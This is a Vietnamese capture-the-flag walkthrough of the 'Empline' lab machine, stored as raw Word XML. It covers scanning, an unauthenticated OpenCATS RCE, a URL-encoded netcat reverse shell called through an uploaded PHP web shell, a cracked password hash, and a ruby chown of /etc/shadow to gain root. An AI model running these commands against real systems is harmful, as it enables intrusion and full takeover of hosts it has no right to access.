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A5A0" w14:textId="3492F9BD" w:rsidR="00CD5741" w:rsidRDefault="006E6734">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0475FABD" wp14:editId="0E1B1E13">
            <wp:extent cx="5943600" cy="72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A8EC" w14:textId="60C030B1" w:rsidR="006E6734" w:rsidRDefault="006E6734">
      <w:r>
        <w:t>Hôm nay mk trở lại với 1 bài có tên là “Empline”.</w:t>
      </w:r>
      <w:r w:rsidR="00D44AB0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0070239E">
        <w:t xml:space="preserve">Đây là 1 bài khá hay. </w:t>
      </w:r>
      <w:r w:rsidR="00D44AB0">
        <w:t>Bắt đầu thôi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D32F97" w14:textId="36E5C191" w:rsidR="00D44AB0" w:rsidRDefault="00D44AB0" w:rsidP="00D44AB0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Dò quét</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273F97BE" w14:textId="490A0EC5" w:rsidR="00D44AB0" w:rsidRDefault="0027543B" w:rsidP="00D44AB0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="0027543B">
        <w:t>rustscan -b 500 -a 10.10.194.74</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E58272" w14:textId="2831D2F2" w:rsidR="0027543B" w:rsidRDefault="006C76D2" w:rsidP="00D44AB0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F292DCC" wp14:editId="59CEAA0C">
            <wp:extent cx="3714750" cy="96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67D5" w14:textId="017ED811" w:rsidR="006C76D2" w:rsidRDefault="006C76D2" w:rsidP="00D44AB0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Service: mysql, ssh và web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A33B853" w14:textId="665ECF2C" w:rsidR="006C76D2" w:rsidRDefault="00243F74" w:rsidP="00D44AB0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="202500CF" wp14:editId="5BB5BE9F">
            <wp:extent cx="5943600" cy="1457325"/>
            <wp:effectExtent l="0" t="0" r="0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BE71" w14:textId="77777777" w:rsidR="00243F74" w:rsidRDefault="00243F74" w:rsidP="00243F74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E3EBD06" w14:textId="75F66452" w:rsidR="00243F74" w:rsidRDefault="00243F74" w:rsidP="00243F74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Enum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08739A40" w14:textId="0D600401" w:rsidR="00562B54" w:rsidRDefault="00562B54" w:rsidP="00562B54">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Thử login với mysql =))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58404CCF" w14:textId="37864779" w:rsidR="00243F74" w:rsidRDefault="00562B54" w:rsidP="00243F74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73916DF7" wp14:editId="23B51BC0">
            <wp:extent cx="5943600" cy="456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ADC5" w14:textId="00035154" w:rsidR="00562B54" w:rsidRDefault="000424D2" w:rsidP="00243F74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cổng 80 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A53BC9D" w14:textId="686523D8" w:rsidR="000424D2" w:rsidRDefault="000424D2" w:rsidP="00243F74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B31C9B9" wp14:editId="77EA08EB">
            <wp:extent cx="5943600" cy="2729865"/>
            <wp:effectExtent l="0" t="0" r="0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F4B5" w14:textId="443D435F" w:rsidR="000424D2" w:rsidRDefault="009D2D43" w:rsidP="00243F74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Khi “View Page Source” thì chúng ta sẽ tìm đc virtual host là empline.thm và job.empline.thm. =&gt; add vào file /etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7A31D8" w14:textId="7D4E7511" w:rsidR="009D2D43" w:rsidRDefault="009D2D43" w:rsidP="00243F74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="165E58EF" wp14:editId="414A3D5F">
            <wp:extent cx="5943600" cy="835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FA0C" w14:textId="42957562" w:rsidR="009D2D43" w:rsidRDefault="007C0B28" w:rsidP="00243F74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B08CE1A" wp14:editId="58C2BAC4">
            <wp:extent cx="4724400" cy="2778613"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175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939" cy="27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A71" w14:textId="22FF71EB" w:rsidR="007C0B28" w:rsidRDefault="001715EA" w:rsidP="00243F74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Ở</w:t>
      </w:r>
      <w:r w:rsidR="007C0B28">
        <w:t xml:space="preserve"> job.empline.thm thì họ đang dùng opencats version 0.9.4. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1E7A77" w14:textId="187C993E" w:rsidR="001715EA" w:rsidRDefault="001715EA" w:rsidP="00243F74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="604A75C0" wp14:editId="3DF5F24E">
            <wp:extent cx="4953000" cy="1131358"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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850" cy="11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9CD0" w14:textId="7D8E7F61" w:rsidR="001715EA" w:rsidRDefault="001715EA" w:rsidP="00243F74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">RCE mà ko cần xác thực. </w:t>
      </w:r>
      <w:r w:rsidR="0048548A">
        <w:t>Lỗi này ghê đây.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013BA603" w14:textId="77777777" w:rsidR="007C0B28" w:rsidRDefault="007C0B28" w:rsidP="00243F74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07B0F3C0" w14:textId="0C2EE836" w:rsidR="007C0B28" w:rsidRDefault="007C0B28" w:rsidP="007C0B28">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Khai thác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8F090D" w14:textId="36450A7A" w:rsidR="00B35783" w:rsidRDefault="00B35783" w:rsidP="00B35783">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="285E32C5" wp14:editId="59DFC24B">
            <wp:extent cx="3911974" cy="23317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573" cy="23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E0E" w14:textId="2080997F" w:rsidR="006D7B2D" w:rsidRDefault="006D7B2D" w:rsidP="00B35783">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="008D6FA3" w14:textId="5B5799AC" w:rsidR="006D7B2D" w:rsidRDefault="008D0CDB" w:rsidP="00B35783">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Shell của chương trình này vẫn chưa đc tối ưu nên mìn</w:t>
      </w:r>
      <w:r w:rsidR="007238D1">
        <w:t>h dùng cách này để lấy shell (dựa vào file 6q9VT.php mà chúng ta đã upload nhờ chương trình exploit.sh)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480E3CC8" w14:textId="35BA378F" w:rsidR="008D0CDB" w:rsidRDefault="008D0CDB" w:rsidP="00B35783">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62B63BC9" wp14:editId="39E588B4">
            <wp:extent cx="5943600" cy="26987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3E71" w14:textId="3F52588E" w:rsidR="008D0CDB" w:rsidRDefault="008D0CDB" w:rsidP="00B35783">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67B4D569" w14:textId="4026725B" w:rsidR="008D0CDB" w:rsidRDefault="008D0CDB" w:rsidP="00B35783">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Do là để trên URL nên mk encode cho yên tâm =))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551C21D1" w14:textId="1336C8AB" w:rsidR="008D0CDB" w:rsidRDefault="008D0CDB" w:rsidP="00B35783">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">“curl </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidR="005559FD" w:rsidRPr="005A499A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://</w:t>
        </w:r>
        <w:r w:rsidR="005559FD" w:rsidRPr="005A499A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>job.empline.thm/upload/careerportaladd/6q9VT.php?0=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.8.231.56%204444%20%3E%2Ftmp%2Ff</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1912F558" w14:textId="1DFAFE39" w:rsidR="005559FD" w:rsidRDefault="005559FD" w:rsidP="00B35783">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40F79771" w14:textId="314517C1" w:rsidR="005559FD" w:rsidRDefault="00BB5642" w:rsidP="00BB5642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Leo thang</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AD20CD" w14:textId="1037964F" w:rsidR="00BB5642" w:rsidRDefault="006113ED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7CD9CC07" wp14:editId="2154312A">
            <wp:extent cx="3806903" cy="3482340"/>
            <wp:effectExtent l="0" t="0" r="3175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223" cy="34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0B2C" w14:textId="474F72D9" w:rsidR="006113ED" w:rsidRDefault="006113ED" w:rsidP="00BB5642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DF5BCD5" w14:textId="1B727766" w:rsidR="006113ED" w:rsidRDefault="006113ED" w:rsidP="00BB5642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ở file config.php chúng ta tìm được user/pass để connect đến DB. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115B4E03" w14:textId="25AC9B8E" w:rsidR="00484C12" w:rsidRDefault="00B123EF" w:rsidP="00BB5642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00484C12" w:rsidRPr="00484C12">
        <w:t>mysql -u james -p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78230FBB" w14:textId="2D35F01A" w:rsidR="00484C12" w:rsidRDefault="00B123EF" w:rsidP="00BB5642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00484C12">
        <w:t>show databases;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0A571C" w14:textId="4BD76ECC" w:rsidR="00484C12" w:rsidRDefault="00B123EF" w:rsidP="00BB5642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00484C12">
        <w:t>use opencats;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33757332" w14:textId="17AFE7E2" w:rsidR="00484C12" w:rsidRDefault="00B123EF" w:rsidP="00BB5642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00484C12">
        <w:t>show tables;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC145EE" w14:textId="3321581D" w:rsidR="00484C12" w:rsidRDefault="00B123EF" w:rsidP="00BB5642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00484C12">
        <w:t>select * from user;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28614FF5" w14:textId="47B775C4" w:rsidR="006113ED" w:rsidRDefault="006113ED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258F7C02" wp14:editId="103E7913">
            <wp:extent cx="4587570" cy="1295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580" cy="13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ABF4" w14:textId="739E11ED" w:rsidR="00484C12" w:rsidRDefault="00505536" w:rsidP="00BB5642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Crack hash của user George</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E2D867" w14:textId="3CA5D895" w:rsidR="00505536" w:rsidRDefault="00505536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5B6CEF32" wp14:editId="299B0F47">
            <wp:extent cx="5943600" cy="164592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920A" w14:textId="27A89CE2" w:rsidR="00505536" w:rsidRDefault="00505536" w:rsidP="00BB5642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Sử dụng pass này để login vào user George.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6F07D0" w14:textId="2AC7E04F" w:rsidR="007B4507" w:rsidRDefault="009751C4" w:rsidP="00984516">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1ED39A58" wp14:editId="292E7277">
            <wp:extent cx="4899347" cy="356616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598" cy="35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903F" w14:textId="57EA6B37" w:rsidR="007B4507" w:rsidRDefault="007B4507" w:rsidP="00BB5642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Xác định SUDO rights, SUID files, cronjob files, linux kernel,</w:t>
      </w:r>
      <w:r w:rsidR="005160E5">
        <w:t xml:space="preserve"> capabilities,</w:t>
      </w:r>
      <w:r>
        <w:t>…..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE0CF65" w14:textId="4D813A52" w:rsidR="005160E5" w:rsidRDefault="005160E5" w:rsidP="00BB5642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71A73387" w14:textId="7E5B18D2" w:rsidR="005160E5" w:rsidRDefault="005160E5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07D42C4D" wp14:editId="00428D7E">
            <wp:extent cx="5943600" cy="570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56E4" w14:textId="296D2BE9" w:rsidR="007B4507" w:rsidRDefault="007B4507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61FE7ACB" wp14:editId="53E9AE56">
            <wp:extent cx="5072058" cy="3688080"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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687" cy="37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467C" w14:textId="42AEEFC5" w:rsidR="0070314E" w:rsidRDefault="0070314E" w:rsidP="00BB5642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C31218C" w14:textId="3668A1FF" w:rsidR="0070314E" w:rsidRDefault="0070314E" w:rsidP="00BB5642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Như mn thấy, chúng ta có thể sử dụng ngôn ngữ ruby để chown file hoặc folder bất kỳ</w:t>
      </w:r>
      <w:r w:rsidR="002E2100">
        <w:t xml:space="preserve"> mà ko bị giới hạn về quyền.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671B962A" w14:textId="69EE5C65" w:rsidR="002E2100" w:rsidRDefault="00B75769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0756AD60" wp14:editId="79C08655">
            <wp:extent cx="5943600" cy="300736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FB8" w14:textId="66D9EEA9" w:rsidR="00B75769" w:rsidRDefault="00B75769" w:rsidP="00BB5642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51A5BD4F" w14:textId="281738B5" w:rsidR="00B75769" w:rsidRDefault="00B75769" w:rsidP="00BB5642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Do user George có userID và groupID là 1002 nên chúng ta phải sửa lại payload trên.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE7496E" w14:textId="3499FA3C" w:rsidR="00B75769" w:rsidRDefault="00B75769" w:rsidP="00BB5642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00B75769">
        <w:t>ruby -e 'require "fileutils"; FileUtils.chown(100</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00B75769">
        <w:t>, 100</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00B75769">
        <w:t>, "/etc/shadow")'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1221A405" w14:textId="2F9E0D96" w:rsidR="00952C5D" w:rsidRDefault="00952C5D" w:rsidP="00BB5642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D7C0F0E" w14:textId="2E7B3E26" w:rsidR="00952C5D" w:rsidRDefault="00952C5D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33C1AE1D" wp14:editId="59F53190">
            <wp:extent cx="5943600" cy="31851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13AB" w14:textId="6F5B551E" w:rsidR="00952C5D" w:rsidRDefault="00952C5D" w:rsidP="00BB5642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DDD637A" w14:textId="39BBC210" w:rsidR="00952C5D" w:rsidRDefault="00952C5D" w:rsidP="00BB5642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Lúc này thì file /etc/shadow đã thuộc quyền sở hữu của user george nên chúng ta có quyền read/write file này. Trong tình huống này</w:t>
      </w:r>
      <w:r w:rsidR="0048578E">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> mk sửa lại hash của user root rồi tiến hành login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E27DDDF" w14:textId="7A776B61" w:rsidR="00952C5D" w:rsidRDefault="00952C5D" w:rsidP="00BB5642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="525F715B" w14:textId="0E7855DA" w:rsidR="00952C5D" w:rsidRDefault="00952C5D" w:rsidP="00BB5642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63384405" wp14:editId="00965CDF">
            <wp:extent cx="5438775" cy="3143250"/>
            <wp:effectExtent l="0" t="0" r="952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4751" w14:textId="0D5F9F71" w:rsidR="00EA5F3E" w:rsidRDefault="00EA5F3E" w:rsidP="00BB5642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28746395" w14:textId="6E1D87BB" w:rsidR="00EA5F3E" w:rsidRDefault="00EA5F3E" w:rsidP="00BB5642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Thành công rồi. See you again.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737CB7C4" w14:textId="77777777" w:rsidR="00EA5F3E" w:rsidRDefault="00EA5F3E" w:rsidP="00BB5642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68900CD2" w14:textId="7948BE02" w:rsidR="00B35783" w:rsidRDefault="00B35783" w:rsidP="00B35783">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76AE5E3D" w14:textId="77777777" w:rsidR="00B35783" w:rsidRDefault="00B35783" w:rsidP="00B35783">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00B35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82305"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="36A0F6A4"/>
    <w:lvl w:ilvl="0" w:tplc="652E0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50899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39"/>
    <w:rsid w:val="000424D2"/>
    <w:rsid w:val="001715EA"/>
    <w:rsid w:val="00243F74"/>
    <w:rsid w:val="0027543B"/>
    <w:rsid w:val="002E2100"/>
    <w:rsid w:val="00484C12"/>
    <w:rsid w:val="0048548A"/>
    <w:rsid w:val="0048578E"/>
    <w:rsid w:val="00505536"/>
    <w:rsid w:val="005160E5"/>
    <w:rsid w:val="005559FD"/>
    <w:rsid w:val="00562B54"/>
    <w:rsid w:val="006113ED"/>
    <w:rsid w:val="00664452"/>
    <w:rsid w:val="006C76D2"/>
    <w:rsid w:val="006D7B2D"/>
    <w:rsid w:val="006E6734"/>
    <w:rsid w:val="0070239E"/>
    <w:rsid w:val="0070314E"/>
    <w:rsid w:val="007238D1"/>
    <w:rsid w:val="007B4507"/>
    <w:rsid w:val="007C0B28"/>
    <w:rsid w:val="008D0CDB"/>
    <w:rsid w:val="00952C5D"/>
    <w:rsid w:val="009751C4"/>
    <w:rsid w:val="00984516"/>
    <w:rsid w:val="009D2D43"/>
    <w:rsid w:val="00B123EF"/>
    <w:rsid w:val="00B35783"/>
    <w:rsid w:val="00B75769"/>
    <w:rsid w:val="00B7684C"/>
    <w:rsid w:val="00BB5642"/>
    <w:rsid w:val="00CD5741"/>
    <w:rsid w:val="00D44AB0"/>
    <w:rsid w:val="00EA5F3E"/>
    <w:rsid w:val="00F6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FD749"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{50683CD9-E57D-45BF-AB46-39585619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A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9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5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://job.empline.thm/upload/careerportaladd/6q9VT.php?0=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.8.231.56%204444%20%3E%2Ftmp%2Ff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33</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-09-04T09:39:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-09-04T10:38:00Z</dcterms:modified>
</cp:coreProperties>
</file>